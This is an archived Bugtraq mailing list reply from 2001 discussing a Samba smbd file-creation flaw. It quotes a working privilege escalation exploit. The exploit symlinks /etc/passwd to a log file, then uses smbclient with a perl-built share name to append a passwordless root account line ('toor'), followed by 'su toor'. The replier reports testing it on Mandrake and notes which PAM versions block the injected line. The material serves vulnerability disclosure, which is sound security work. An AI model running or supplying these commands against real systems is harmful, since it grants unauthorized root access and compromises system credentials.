Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: smbd remote file creation vulnerability
From: maniac () localhost sk
Date: Mon, 25 Jun 2001 00:14:02 +0200

Exploit:

   This is the scenario of local privilege escalation attack against
   RedHat 7.x installation:

   $ ln -s /etc/passwd /tmp/x.log

   $ smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
     -n ../../../tmp/x -N

   ...where 'NIMUE' stands for local host name (few error messages
   should be returned).

   $ su toor
   #


Hi,

Mandrake 7.1 (Mandrake 8.0 and RedHat6.2) defaultly logs here:
/var/log/samba/log.%m

I replaced it with /var/log/samba/%m.log and used your exploit, which
worked - into /etc/passwd was appended also line:
  toor::0:0::/:/bin/sh

But until there was that two spaces onto begining of line, it was
impossible to su to that account, this is error message:

Jun 24 23:28:55 localhost PAM_pwdb[23844]: check pass; user unknown

I tried to insert \r after the first \n, but unsucessfully. 
I'm using pam-0.72-7mdk.

This versions of PAM also don't permit spaces on begining of line:
pam-0.72-20.6.x (Redhat6.2)
pam-0.74-6mdk (Mandrake8.0(

Maybe sshd without PAM support and permitting empty password may be
'vulnerable' on such systems.

maniac


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]